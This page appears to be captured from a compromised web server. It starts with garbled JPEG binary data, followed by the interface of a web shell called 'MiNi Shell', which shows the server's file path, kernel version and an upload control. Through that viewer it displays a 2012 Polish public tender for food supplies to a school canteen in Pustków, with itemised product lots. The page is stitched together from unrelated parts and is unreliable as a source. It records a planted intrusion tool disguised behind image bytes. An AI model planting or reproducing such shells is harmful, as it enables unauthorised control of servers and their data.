JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/5800-N-2012.html

<p class="kh_header"><b>Pustków: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół z Oddziałami Integracyjnymi  w Pustkowie-Osiedlu   -STOŁÓWKA SZKOLNA</b><br>
<b>Numer ogłoszenia: 5800 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół z Odziałami Integracyjnymi w Pustkowie-Osiedlu , Pustków  34, 39-206 Pustków, woj. podkarpackie, tel. 014 68 188 11, faks 014 68 16 032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół z Oddziałami Integracyjnymi  w Pustkowie-Osiedlu   -STOŁÓWKA SZKOLNA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa ARTYKUŁÓW SPOŻYWCZYCH do Zespołu Szkół Integracyjnymi  w Pustkowie-Osiedlu - STOŁÓWKA SZKOLNA - loco magazyn w budynku przedszkola
Realizacja poszczególnych dostaw będzie następować sukcesywnie, tj. wg potrzeb kuchni w przedszkolu, na podstawie zamówień przesyłanych przez Intendentkę, w terminie 2 dni od daty złożonego zamówienia - na ryzyko i koszt Wykonawcy (codziennie od poniedziałku do piątku w godz. od 7.00 - 9.00) w odpowiednio oznaczonych opakowaniach producenta, wraz z rozładunkiem - do pomieszczeń magazynu żywnościowego Zamawiającego - Pustków 34 , 39-206 Pustków-Osiedle . 

Zamawiający dopuszcza składanie ofert w 6 częściach : 

Część 1 : Pieczywo, świeże wyroby piekarskie i ciastkarskie. CPV : 15810000-9, 15811100-7 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- CENOWY - Załącznik nr 1 do SIWZ. 

Część 2 : Produkty mleczarskie . CPV : 15500000-3, 15510000-0, 15530000-2, 15431100-9 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 2 do SIWZ. 

Część 3 : Warzywa mrożone, ryby mrożone, filety rybne i pozostałe mięso ryb . CPV: 15331170-9, 15220000-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 3 do SIWZ. 

Część 4: Produkty zwierzęce, mięso i produkty mięsne. CPV: 15100000-9, 15112210-1, 15111000-9, 15110400-9, 15131133-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 4 do SIWZ. 

Część 5 : Zboża, ziemniaki, warzywa, owoce i orzechy, jaja . CPV: 03200000-3, 03142500-3 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 5 do SIWZ. 

Część 6 : Różne produkty spożywcze. CPV : 15800000-6 
Szczegółowy opis przedmiotu zamówienia stanowi FORMULARZ ASORTYMENTOWO- 
CENOWY - Załącznik nr 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.91.11.00-7, 15.50.00.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9, 15.33.11.70-9, 15.10.00.00-9, 15.11.22.10-1, 15.11.10.00-9, 15.11.04.00-9, 15.13.11.33-6, 03.20.00.00-3, 03.14.25.00-3, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca wykaże, że 
w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) -  wykonał  :
-minimum 1 dostawę odpowiadającą swoim rodzajem i wartością dostawie stanowiącej  przedmiot zamówienia , z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców. Wymagane jest wykazanie co najmniej jednej  w/w dostawy o wartości min. 10 000,00 zł brutto oraz załączenie dokumentów potwierdzających, że dostawa ta została wykonana należycie ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie 
o spełnieniu warunków udziału w postępowaniu (Załącznik nr 8 do SIWZ), a jeżeli zamawiający żąda dokumentów  potwierdzających spełnianie tych warunków, również te dokumenty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej i zgody obu stron- pod rygorem nieważności takich zmian. 
2. Wyłącznie w przypadku wystąpienia okoliczności których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy możliwa jest zmiana umowy dotycząca :
2) zakresu i sposobu wykonania przedmiotu zamówienia w uzgodnieniu z Wykonawcą w przypadku :
          a) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży 
             w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
     3)Innych postanowień umowy w przypadkach:
          a) zmiany stawek podatku od towarów i usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ SZKÓŁ Z ODDZIAŁAMI INTEGRACYJNYMI              W PUSTKOWIE-OSIEDLU, Pustków 34, 39-206 Pustków-Osiedle.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2012 godzina 09:00, miejsce: Sekretariat Dyrektora Zespołu Szkół z Oddziałąmi Integracyjnymi w Pustkowie-Osiedlu: Pustków 34, 39-206 Pustków-Osiedle.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie i ciastkarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb zwykły bez dodatków  waga 800g krojony	szt	1800
chleb graham 0,5 kg krojony	kg	500
bułka weka 0,4kg krojona	szt	500
pączek 100g	szt	1200
drożdżówka -  różne nadzienia  waga 100g	szt	1000
bułka maślana 50g	szt	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ser twarogowy półtłusty w kostkach 250g 	kg	250
jogurt owocowy 150g	szt	7000
mleko o zawartości tłuszczu 2% 0,9L folia	szt	5400
ser żółty Salami	kg	55
śmietana  18% 400g	szt	850
serek owocowy 4x 50g 	szt	800
serek topiony kremowy o wadze 100g różne smaki	szt	200
serek homogenizowany 150g  	szt	250
masło extra 200g o zawartości tłuszczu min. 82%	szt	1500
ser gouda	kg	45
ser edamski	kg	30
śmietana 18% 500g	szt	250
jogurt naturalny 150g	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa mrożone, ryby mrożone, filety rybne i pozostałe mięso ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> włoszczyzna 2500g	kg	450
brokuły 2500g	szt	15
fasolka szparagowa żółta 2500g	kg	40
mieszanka kompotowa (bez rabarbaru) 2500g	kg	65
marchew z groszkiem 2500g	kg	50
wiśnia 2500g	kg	50
porzeczka czarna 2500g	kg	130
kalafior 2500g	kg	100
mieszanka 6-składnikowa 2500g	kg	75
truskawka 2500g	kg	120
zupa pieczarkowa 2500g	kg	45
paluszki rybne z fileta z mintaja panierowane	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mięso mielone wołowo-wieprzowe	kg	400
mięso wieprzowe b/k - szynka	kg	550
parówka cienka drobiowa	kg	60
boczek wędzony gotowany	kg	100
smalec	kg	20
mięso wołowe pieczeniowe b/k	kg	120
ćwiartka tylna z kurczaka	kg	500
szynka gotowana	kg	60
polędwica sopocka	kg	35
drumstik drobiowy.	kg	50
lencz	kg	40
żeberka wp paski	kg	60
filet drobiowy pojedynczy	kg	700
porcja rosołowa	kg	250
kiełbasa krakowska podsuszana	kg	30
kiełbasa toruńska	kg	250
kiełbasa swojska	kg	80
szynka konserwowa	kg	25
mięso gulaszowe wp chude	kg	200
kiełbasa szynkowa	kg	50
łopatka wp. b/k	kg	150
polędwica drobiowa	kg	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.22.10-1, 15.11.10.00-9, 15.11.04.00-9, 15.13.11.33-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zboża, ziemniaki, warzywa, owoce i orzechy, jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> banany	kg	500
buraki ćwikłowe	kg	300
brzoskwinia	kg	50
cebula	kg	150
czosnek	szt	20
cytryna	kg	20
gruszki	kg	150
jabłka	kg	1500
kapusta biała	kg	600
kapusta czerwona	kg	120
kapusta pekińska	szt	80
kapusta kiszona	kg	180
kapusta włoska	kg	25
koperek zielony pęczek	szt	500
klementynki	kg	60
kiwi	kg	15
marchew	kg	500
mandarynki	kg	250
nektarynki	kg	25
ogórek szklarniowy	kg	100
ogórek gruntowy	kg	150
papryka świeża	kg	15
pietruszka natka pęczek	szt	500
pietruszka korzeń	kg	300
pieczarki świeże	kg	50
pory	szt	300
pomidory	kg	120
pomarańcze	kg	60
rzodkiewka pęczek	szt	50
sałata zielona	szt	100
seler korzeń	kg	400
owoce suszone	kg	2
szczypiorek pęczek	szt	100
śliwka	kg	50
truskawka	kg	50
winogrono	kg	30
ziemniaki	kg	8000
ziemniak młody	kg	300
jaja kurze świeże L	szt	10 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> groch łuskany 500g	szt	100
drożdze 100g	szt	40
ketchup łagodny 450g łagodny	szt	150
kisiel 1,3 kg różne smaki	kg	25
galaretka owocowa	kg	40
woda mineralna niegazowana 5L	szt	200
jabłka prażone z brzoskwinią 0,9L	szt	150
sól jodowana	kg	200
chrzan tarty 180g	szt	20
przyprawa do mięsa mielonego 700g	szt	4
kminek	kg	2
ziele angielskie 	kg	2
liść laurowy 100g	szt	10
przyprawa warzywna równoważna Ziarenka Smaku 200g	szt	100
wafel w czekoladzie 37g	szt	3500
cukierki czekoladowe (galaretka)	kg	25
ciastka luz różne	kg	50
sos toffi 1kg 	szt	50
majonez 310ml	szt	50
sos do spaghetti 450g	szt	500
czekolada mleczna 100g	szt	550
ćwikła z chrzanem 670g	szt	450
ryż	kg	150
ryż 400g saszetki	szt	350
płatki kukurydziane zaw. kukurydzy 97%	kg	80
płatki czekoladowe 550g	szt	200
płatki wielozbożowe 550g	szt	140
pasztet drobiowy 135g różne smaki	szt	240
powidło śliwkowe 340g	szt	50
miód naturalny 25g	szt	600
kakao 400g rozpuszczalne	szt	60
kawa zbożowa 200g	szt	55
mąka pszenna	kg	800
mąka ziemniaczana 500g	szt	60
cukier	kg	1000
cukier puder	kg	50
kasza jęczmienna 400g	szt	500
pieprz mielony	kg	3
przyprawa do zup w płynie 1kg	szt	100
cukier waniliowy 32g	szt	200
krem czekoladowo-orzechowy (nutella) 630g	szt	80
ogórek konserwowy 0,9L	szt	600
ogórek kwaszony 0,8L	szt	300
koncentrat pomidorowy 30% 200g	szt	500
koncentrat pomidorowy 30% 1000g	szt	40
koncentrat buraczany 300ml	szt	60
żurek 0,5L	szt	300
szprot w pomidorach 170g	szt	150
kwasek cytrynowy 1,3kg	szt	3
kasza manna 500g	szt	50
sok marchwiowo-owocowy 0,9L	szt	300
syrop owocowy 440ml	szt	1000
herbata czarna granulowana  90g	szt	100
makaron z mąki durum (nitki, spaghetti, świderki, muszelki, łazanki, itp)	kg	1200
olej uniwersalny 	litr	250
oliwa z oliwek 750ml	szt	10
musztarda stołowa 175g	szt	40
dżem n/s 250g (brzoskwinia, truskawka, wiśnia, czarna porzeczka, owoce leśne)	szt	250
rosołek drobiowy 180g	szt	200
miód naturalny 400g	szt	50
przyprawa do kurczaka	kg	4
kasza jęczmienna średnia	kg	40
sok marchwiowo-owocowy 0,3L plastik	szt	1250
sałatka warzywna obiadowa 900g 	szt	400
kasza jęczmienna wiejska gruba	kg	50
zupa grochowa 75g	szt	60
majeranek	kg	2
sos pieczeniowy (jasny, ciemny)	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com